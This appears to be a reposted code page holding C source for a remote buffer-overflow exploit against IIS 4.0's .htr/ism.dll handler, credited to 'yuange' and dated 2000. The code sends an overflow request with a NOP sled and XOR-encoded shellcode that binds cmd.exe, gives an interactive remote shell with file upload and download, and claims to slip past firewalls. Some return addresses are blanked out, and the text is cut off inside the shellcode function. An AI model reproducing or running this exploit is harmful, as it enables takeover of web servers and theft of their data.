?? windows下強大功能的溢出程序源代碼.txt
字號:
windows下強大功能的溢出程序源代碼
--------------------------------------------------------------------------------
作者:袁哥 yuange@nsfocus.com
主頁:http://www.nsfocus.com
/*----------------------------------------------------------*/
/* IIS4.0的.htr映射ism.dll溢出攻擊程序 */
/* 編寫:yuange(yuange@nsfocus.com) */
/* 本程序實現所有語言版本WINDOWS下的溢出攻擊。 */
/* SHELLCODE代碼實現綁定cmd.exe功能,實現上傳、 */
/* 下傳文件的ftp功能,實現加密傳輸功能,不開 */
/* 端口、不開服務,可以繞過防火墻等。獨創的實 */
/* 現源代碼編寫shellcode的辦法,可以方便編寫、 */
/* 修改、調試shellcode,使得編寫強大功能的 */
/* shellcode成為可能。也解決了溢出攻擊的幾個根 */
/* 本問題:1、溢出點確定;2、shellcode定位; */
/* 3、jmp esp功能代碼地址確定;4、WINDOWS的API */
/* 調用地址版本相關問題。另一個版本實現了接管 */
/* WWW功能,可以實現不修改WEB頁面文件的情況下替 */
/* 換所有WEB頁面。 */
/* 一般的溢出攻擊程序也可以使用這個框架 */
/* */
/* 程序在vc6.0下編譯通過 */
/*----------------------------------------------------------*/
/*
iis4。0 overflow program ver 1.0
copy by yuange <yuange@163.net> 2000。05。8
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
#define FNENDLONG 0x08
#define NOPCODE 'B' // INC EDX 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
// c:\inetpub\wwwroot 物理路徑長度。
// 因為WWW處理GET /的時候前面要加物理路徑,再傳遞給ISM.DLL處理,所以溢出點與物理路徑有
// 關。可以先用.IDC,.ida,.idq泄露物理路徑的辦法得到物理路徑長度
#define RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define ADD1 0xxxx-0xxxxx-PATHLONG+4
#define ADD2 0xxxxx-0xxxxx-PATHLONG+4
/* 由于一些原因,這兒數據不提供 2000.10.25 */
// 兩個要處理的參數地址,參見后面ISM.DLL有問題代碼的注釋
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 12
#define DATAXORCODE 0xAA
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define WEBPORT 80
void shellcodefnlock();
void shellcodefn(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;
int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0"
"strend";
char buff1[]="GET /""\xff""default.htr/";
char buff2[]=".HTR HTTP/1.1 \nHOST:";
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx";
// ret
char eipexcept[]="\xxx\xxx\xxx\xxx";
char eipwinnt[] ="\xxx\xxx\xxx\xxx";
char eipwinnt2[]="\xxx\xxx\xxx\xxx";
char reteax[] ="\xxx\xxx\xxx\xxx";
/* 由于一些原因,這兒數據不提供 2000.10.25 */
char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct sockaddr_in s_in2,s_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
int i,j,k;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;
SOCKET d_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
fprintf(stderr,"\n usage: %s <server> [offset] [webport] \n", argv[0]);
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i<strlen(recvbuff);++i){
if(recvbuff[i]!=' ') break;
}
server=recvbuff;
if(i<strlen(recvbuff)) server+=i;
fprintf(stderr,"\n please enter the offset(0-3):");
gets(buff);
for(i=0;i<strlen(buff);++i){
if(buff[i]!=' ') break;
}
offset=atoi(buff+i);
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
if(argc>2){
offset=atoi(argv[2]);
}
OVERADD+=offset;
/*
if(offset<0||offset>3){
fprintf(stderr,"\n offset error !offset 0 - 3 .");
gets(buff);
exit(1);
}
*/
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];
for(i=0;i<strlen(server);++i){
if(server[i]!=' ')
break;
}
if(i<strlen(server)) server+=i;
for(i=0;i+3<strlen(server);++i){
if(server[i]==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) {
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
gets(buff);
exit(1);
}
_asm{
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else memcpy(buff,buff1,strlen(buff1));
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);
sendpacketlong=k+i;
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}
for(i=0;i<sendpacketlong;++i){
temp=shellcodebuff[i];
temp^=DATAXORCODE;
if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){
buff[OVERADD+NOPLONG+k]='0';
++k;
temp+=0x40;
}
buff[OVERADD+NOPLONG+k]=temp;
++k;
}
// memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
// k+=sendpacketlong;
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+ADD1+offset+i,eipexcept,4);
memcpy(buff+ADD2+offset+i,eipexcept,4);
}
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+OVERADD+i,eipexcept,4);
}
memcpy(buff+OVERADD+i,eipwinnt2,4);
memcpy(buff+OVERADD+i+4,reteax,4);
memcpy(buff+OVERADD+i+8,eipwinnt,4);
memcpy(buff+OVERADD+i+0x0c,eipwinnt,4);
memcpy(buff+OVERADD+i+0x10,eipjmpshell,7);
// fprintf(stderr,"\n send:\n %s",buff);
fprintf(stderr,"\n offset:%d",offset);
/*
if(argc>2){
server=argv[2];
if(strcmp(server,"win9x")==0){
memcpy(buff+OVERADD,eipwin9x,4);
fprintf(stderr,"\n nuke win9x.");
}
if(strcmp(server,"winnt")==0){
memcpy(buff+OVERADD,eipwinnt,4);
fprintf(stderr,"\n nuke winnt.");
}
}
*/
sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
/*
#ifdef DEBUG
_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
*/
if(argc>6){
if(strcmp(argv[6],"debug")==0){
_asm{
lea esp,buff
add esp,OVERADD
ret
}
}
}
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send packet %d bytes.",j);
send(fd,buff,j,0);
k=newrecv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
xordatabegin=1;
k=-1;
fprintf(stderr,"\n ok!\n");
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
k=1;
while(k!=0){
if(k<0){
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
}
else{
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
}
else i=1;
}
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
newsend(fd,buff,k+2,0);
}
k=newrecv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
xordatabegin=1;
k=-1;
}
if(k>0){
buff[k]=0;
fprintf(stderr,"%s",buff);
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
_emit('?')
xor ecx,ecx
add si,474h
cmp dword ptr [esi],ecx
jnz getesi
add si,4
getesi: mov esi,[esi]
add si,8
xor ecx,ecx
mov byte ptr [esi],cl
jmp next
getediadd: pop EDI
push EDI
pop ESI
push ebx // ecb
push ebx // call shellcodefn ret address
xor ecx,ecx
looplock: lodsb
cmp al,cl
jz shell
cmp al,0x30
jz clean0
sto: xor al,DATAXORCODE
stosb
jmp looplock
clean0: lodsb
sub al,0x40
jmp sto
next: call getediadd
shell: NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void shellcodefn(char *ecb)
{
char Buff[SHELLBUFFSIZE+2];
int *except[3];
FARPROC Sleepadd;
FARPROC GetLastErroradd;
FARPROC GetFileSizeadd;
FARPROC CreateFileAadd;
FARPROC WriteFileadd;
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -